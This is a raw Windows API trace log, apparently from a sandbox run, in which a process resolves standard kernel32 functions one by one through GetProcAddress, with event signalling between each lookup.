	[0197.673] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.676] GetProcAddress (hModule=0x76b10000, lpProcName="GetTickCount") returned 0x76b5ba60
	[0197.676] ResetEvent (hEvent=0x8) returned 1
	[0197.676] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.678] GetProcAddress (hModule=0x76b10000, lpProcName="FlushFileBuffers") returned 0x76b47f81
	[0197.678] ResetEvent (hEvent=0x8) returned 1
	[0197.678] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.680] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualFree") returned 0x76b61da4
	[0197.680] ResetEvent (hEvent=0x8) returned 1
	[0197.680] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.683] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAlloc") returned 0x76b62fb6
	[0197.683] ResetEvent (hEvent=0x8) returned 1
	[0197.683] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.685] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcess") returned 0x76b5cdcf
	[0197.685] ResetEvent (hEvent=0x8) returned 1
	[0197.685] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.687] GetProcAddress (hModule=0x76b10000, lpProcName="SetEvent") returned 0x76b5bccc
	[0197.687] ResetEvent (hEvent=0x8) returned 1
	[0197.687] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.690] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0197.690] ResetEvent (hEvent=0x8) returned 1
	[0197.690] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.692] GetProcAddress (hModule=0x76b10000, lpProcName="CreateEventW") returned 0x76b63386
	[0197.692] ResetEvent (hEvent=0x8) returned 1
	[0197.692] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.694] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleW") returned 0x76b6374d
	[0197.694] ResetEvent (hEvent=0x8) returned 1
	[0197.694] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.697] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0197.697] ResetEvent (hEvent=0x8) returned 1
	[0197.697] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.699] GetProcAddress (hModule=0x76b10000, lpProcName="UnhandledExceptionFilter") returned 0x76b6ed38
	[0197.699] ResetEvent (hEvent=0x8) returned 1
	[0197.699] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.702] GetProcAddress (hModule=0x76b10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76b63d01
	[0197.702] ResetEvent (hEvent=0x8) returned 1
	[0197.702] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.704] GetProcAddress (hModule=0x76b10000, lpProcName="GetStartupInfoW") returned 0x76b63891
	[0197.704] ResetEvent (hEvent=0x8) returned 1
	[0197.704] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.706] GetProcAddress (hModule=0x76b10000, lpProcName="IsProcessorFeaturePresent") returned 0x76b676b5
	[0197.707] ResetEvent (hEvent=0x8) returned 1
	[0197.707] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.748] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeSListHead") returned 0x77395eeb
	[0197.748] ResetEvent (hEvent=0x8) returned 1
	[0197.748] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.751] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateProcess") returned 0x76b52331
	[0197.751] ResetEvent (hEvent=0x8) returned 1
	[0197.751] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.753] GetProcAddress (hModule=0x76b10000, lpProcName="CreateMutexW") returned 0x76b52aee
	[0197.753] ResetEvent (hEvent=0x8) returned 1
	[0197.753] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.755] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceFrequency") returned 0x76b522a7
	[0197.755] ResetEvent (hEvent=0x8) returned 1
	[0197.755] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.758] GetProcAddress (hModule=0x76b10000, lpProcName="GetTempPathW") returned 0x76b48b33
	[0197.758] ResetEvent (hEvent=0x8) returned 1
	[0197.758] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.760] GetProcAddress (hModule=0x76b10000, lpProcName="UnlockFileEx") returned 0x76b76947
	[0197.760] ResetEvent (hEvent=0x8) returned 1
	[0197.760] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.761] GetProcAddress (hModule=0x76b10000, lpProcName="SetEndOfFile") returned 0x76b52319
	[0197.761] ResetEvent (hEvent=0x8) returned 1
	[0197.761] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.763] GetProcAddress (hModule=0x76b10000, lpProcName="GetFullPathNameA") returned 0x76b63735
	[0197.763] ResetEvent (hEvent=0x8) returned 1
	[0197.763] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.764] GetProcAddress (hModule=0x76b10000, lpProcName="SetFilePointer") returned 0x76b5db36
	[0197.764] ResetEvent (hEvent=0x8) returned 1
	[0197.764] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.766] GetProcAddress (hModule=0x76b10000, lpProcName="LockFile") returned 0x76b7642f
	[0197.766] ResetEvent (hEvent=0x8) returned 1
	[0197.766] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.767] GetProcAddress (hModule=0x76b10000, lpProcName="OutputDebugStringA") returned 0x76b4eb36
	[0197.767] ResetEvent (hEvent=0x8) returned 1
	[0197.767] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.769] GetProcAddress (hModule=0x76b10000, lpProcName="GetDiskFreeSpaceW") returned 0x76b43530
	[0197.769] ResetEvent (hEvent=0x8) returned 1
	[0197.769] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.770] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedCompareExchange") returned 0x76b5bb92
	[0197.770] ResetEvent (hEvent=0x8) returned 1
	[0197.770] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.772] GetProcAddress (hModule=0x76b10000, lpProcName="WriteFile") returned 0x76b61400
	[0197.772] ResetEvent (hEvent=0x8) returned 1
	[0197.772] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.773] GetProcAddress (hModule=0x76b10000, lpProcName="GetFullPathNameW") returned 0x76b64543
	[0197.773] ResetEvent (hEvent=0x8) returned 1
	[0197.774] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.775] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0197.775] ResetEvent (hEvent=0x8) returned 1
	[0197.775] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.777] GetProcAddress (hModule=0x76b10000, lpProcName="HeapCreate") returned 0x76b63ea2
	[0197.777] ResetEvent (hEvent=0x8) returned 1
	[0197.777] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.778] GetProcAddress (hModule=0x76b10000, lpProcName="TryEnterCriticalSection") returned 0x773832bc
	[0197.778] ResetEvent (hEvent=0x8) returned 1
	[0197.778] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.780] GetProcAddress (hModule=0x76b10000, lpProcName="ReadFile") returned 0x76b596fb
	[0197.780] ResetEvent (hEvent=0x8) returned 1
	[0197.780] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.781] GetProcAddress (hModule=0x76b10000, lpProcName="AreFileApisANSI") returned 0x76b9f311
	[0197.781] ResetEvent (hEvent=0x8) returned 1
	[0197.781] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.825] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenA") returned 0x76b5a611
	[0197.826] ResetEvent (hEvent=0x8) returned 1
	[0197.826] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.827] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0197.827] ResetEvent (hEvent=0x8) returned 1
	[0197.827] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.828] GetProcAddress (hModule=0x76b10000, lpProcName="ExpandEnvironmentStringsA") returned 0x76b48a5b
	[0197.828] ResetEvent (hEvent=0x8) returned 1
	[0197.829] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.830] GetProcAddress (hModule=0x76b10000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x76b4480b
	[0197.830] ResetEvent (hEvent=0x8) returned 1
	[0197.830] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.831] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteCriticalSection") returned 0x77389ac5
	[0197.831] ResetEvent (hEvent=0x8) returned 1
	[0197.831] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.833] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0197.833] ResetEvent (hEvent=0x8) returned 1
	[0197.833] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.834] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0197.834] ResetEvent (hEvent=0x8) returned 1
	[0197.834] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.836] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0197.836] ResetEvent (hEvent=0x8) returned 1
	[0197.836] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.838] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0197.838] ResetEvent (hEvent=0x8) returned 1
	[0197.838] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.839] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0197.839] ResetEvent (hEvent=0x8) returned 1
	[0197.839] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.841] GetProcAddress (hModule=0x76b10000, lpProcName="GetVersionExW") returned 0x76b53b1a
	[0197.841] ResetEvent (hEvent=0x8) returned 1
	[0197.841] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.842] GetProcAddress (hModule=0x76b10000, lpProcName="LocalFree") returned 0x76b5ca64
	[0197.842] ResetEvent (hEvent=0x8) returned 1
	[0197.842] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.844] GetProcAddress (hModule=0x76b10000, lpProcName="GetLastError") returned 0x76b5bf00
	[0197.844] ResetEvent (hEvent=0x8) returned 1
	[0197.844] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.845] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenW") returned 0x76b5d9e8
	[0197.846] ResetEvent (hEvent=0x8) returned 1
	[0197.846] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.847] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.847] ResetEvent (hEvent=0x8) returned 1
	[0197.847] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.849] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcpyA") returned 0x76b59793
	[0197.849] ResetEvent (hEvent=0x8) returned 1
	[0197.849] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.850] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryA") returned 0x76b6395c
	[0197.850] ResetEvent (hEvent=0x8) returned 1
	[0197.850] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.852] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcatA") returned 0x76b5a19f
	[0197.852] ResetEvent (hEvent=0x8) returned 1
	[0197.852] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.853] GetProcAddress (hModule=0x76b10000, lpProcName="SetLastError") returned 0x76b5bb08
	[0197.853] ResetEvent (hEvent=0x8) returned 1
	[0197.853] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.855] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualQuery") returned 0x76b676d6
	[0197.855] ResetEvent (hEvent=0x8) returned 1
	[0197.855] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.857] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThread") returned 0x76b6375d
	[0197.857] ResetEvent (hEvent=0x8) returned 1
	[0197.857] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.858] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0197.858] ResetEvent (hEvent=0x8) returned 1
	[0197.858] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.860] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentDirectoryA") returned 0x76b4733c
	[0197.860] ResetEvent (hEvent=0x8) returned 1
	[0197.860] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.887] GetProcAddress (hModule=0x76b10000, lpProcName="SetCurrentDirectoryA") returned 0x76b5903d
	[0197.887] ResetEvent (hEvent=0x8) returned 1
	[0197.887] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.888] GetProcAddress (hModule=0x76b10000, lpProcName="SystemTimeToFileTime") returned 0x76b5cecb
	[0197.888] ResetEvent (hEvent=0x8) returned 1
	[0197.888] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.890] GetProcAddress (hModule=0x76b10000, lpProcName="ReadConsoleW") returned 0x76b70e73
	[0197.890] ResetEvent (hEvent=0x8) returned 1
	[0197.890] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.891] GetProcAddress (hModule=0x76b10000, lpProcName="WriteConsoleW") returned 0x76b582f1
	[0197.891] ResetEvent (hEvent=0x8) returned 1
	[0197.892] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.893] GetProcAddress (hModule=0x76b10000, lpProcName="SetStdHandle") returned 0x76b9f589
	[0197.893] ResetEvent (hEvent=0x8) returned 1
	[0197.893] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.894] GetProcAddress (hModule=0x76b10000, lpProcName="SetEnvironmentVariableA") returned 0x76b58921
	[0197.894] ResetEvent (hEvent=0x8) returned 1
	[0197.894] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.896] GetProcAddress (hModule=0x76b10000, lpProcName="FreeEnvironmentStringsW") returned 0x76b61dc3
	[0197.896] ResetEvent (hEvent=0x8) returned 1
	[0197.896] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.897] GetProcAddress (hModule=0x76b10000, lpProcName="GetEnvironmentStringsW") returned 0x76b61dbc
	[0197.897] ResetEvent (hEvent=0x8) returned 1
	[0197.897] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.899] GetProcAddress (hModule=0x76b10000, lpProcName="GetCommandLineW") returned 0x76b6679e
	[0197.899] ResetEvent (hEvent=0x8) returned 1
	[0197.899] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.900] GetProcAddress (hModule=0x76b10000, lpProcName="GetCommandLineA") returned 0x76b698ff
	[0197.900] ResetEvent (hEvent=0x8) returned 1
	[0197.900] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.902] GetProcAddress (hModule=0x76b10000, lpProcName="GetOEMCP") returned 0x76b53db9
	[0197.902] ResetEvent (hEvent=0x8) returned 1
	[0197.902] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.904] GetProcAddress (hModule=0x76b10000, lpProcName="IsValidCodePage") returned 0x76b6c1c0
	[0197.904] ResetEvent (hEvent=0x8) returned 1
	[0197.904] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.905] GetProcAddress (hModule=0x76b10000, lpProcName="EncodePointer") returned 0x7738a295
	[0197.906] ResetEvent (hEvent=0x8) returned 1
	[0197.906] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.907] GetProcAddress (hModule=0x76b10000, lpProcName="DecodePointer") returned 0x7738cd10
	[0197.907] ResetEvent (hEvent=0x8) returned 1
	[0197.907] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.909] GetProcAddress (hModule=0x76b10000, lpProcName="GetCPInfo") returned 0x76b61e2e
	[0197.909] ResetEvent (hEvent=0x8) returned 1
	[0197.909] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.910] GetProcAddress (hModule=0x76b10000, lpProcName="CompareStringW") returned 0x76b59bee
	[0197.910] ResetEvent (hEvent=0x8) returned 1
	[0197.910] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.912] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringW") returned 0x76b613d0
	[0197.912] ResetEvent (hEvent=0x8) returned 1
	[0197.912] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.913] GetProcAddress (hModule=0x76b10000, lpProcName="GetLocaleInfoW") returned 0x76b66596
	[0197.913] ResetEvent (hEvent=0x8) returned 1
	[0197.913] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.915] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76b63939
	[0197.915] ResetEvent (hEvent=0x8) returned 1
	[0197.915] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.916] GetProcAddress (hModule=0x76b10000, lpProcName="TlsAlloc") returned 0x76b635a1
	[0197.916] ResetEvent (hEvent=0x8) returned 1
	[0197.916] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.918] GetProcAddress (hModule=0x76b10000, lpProcName="TlsGetValue") returned 0x76b5da70
	[0197.918] ResetEvent (hEvent=0x8) returned 1
	[0197.918] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.920] GetProcAddress (hModule=0x76b10000, lpProcName="TlsSetValue") returned 0x76b5da88
	[0197.920] ResetEvent (hEvent=0x8) returned 1
	[0197.920] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.921] GetProcAddress (hModule=0x76b10000, lpProcName="TlsFree") returned 0x76b613b8
	[0197.921] ResetEvent (hEvent=0x8) returned 1
	[0197.921] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.923] GetProcAddress (hModule=0x76b10000, lpProcName="GetStringTypeW") returned 0x76b667c8
	[0197.923] ResetEvent (hEvent=0x8) returned 1
	[0197.923] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.925] GetProcAddress (hModule=0x76b10000, lpProcName="GlobalAlloc") returned 0x76b59ce1
	[0197.925] ResetEvent (hEvent=0x8) returned 1
	[0197.925] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.926] GetProcAddress (hModule=0x76b10000, lpProcName="GlobalFree") returned 0x76b59cf9
	[0197.926] ResetEvent (hEvent=0x8) returned 1
	[0197.926] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.928] GetProcAddress (hModule=0x76b10000, lpProcName="FindFirstFileA") returned 0x76b62d89
	[0197.928] ResetEvent (hEvent=0x8) returned 1
	[0197.928] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.929] GetProcAddress (hModule=0x76b10000, lpProcName="FindNextFileA") returned 0x76b5a187
	[0197.929] ResetEvent (hEvent=0x8) returned 1
	[0197.929] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.931] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileA") returned 0x76b7532c
	[0197.931] ResetEvent (hEvent=0x8) returned 1
	[0197.931] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.932] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileTime") returned 0x76b50f6f
	[0197.932] ResetEvent (hEvent=0x8) returned 1
	[0197.933] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.934] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedFlushSList") returned 0x77383129
	[0197.934] ResetEvent (hEvent=0x8) returned 1
	[0197.934] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.935] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryExW") returned 0x76b54775
	[0197.936] ResetEvent (hEvent=0x8) returned 1
	[0197.936] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.937] GetProcAddress (hModule=0x76b10000, lpProcName="RaiseException") returned 0x76b4eb60
	[0197.937] ResetEvent (hEvent=0x8) returned 1
	[0197.937] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.938] GetProcAddress (hModule=0x76b10000, lpProcName="RtlUnwind") returned 0x76b47f70
	[0197.938] ResetEvent (hEvent=0x8) returned 1
	[0197.938] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.940] GetProcAddress (hModule=0x76b10000, lpProcName="ExitThread") returned 0x7735f611
	[0197.940] ResetEvent (hEvent=0x8) returned 1
	[0197.940] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.941] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibraryAndExitThread") returned 0x76b4fdb8
	[0197.941] ResetEvent (hEvent=0x8) returned 1
	[0197.941] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.943] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleExW") returned 0x76b53e39
	[0197.943] ResetEvent (hEvent=0x8) returned 1
	[0197.943] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.944] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0197.944] ResetEvent (hEvent=0x8) returned 1
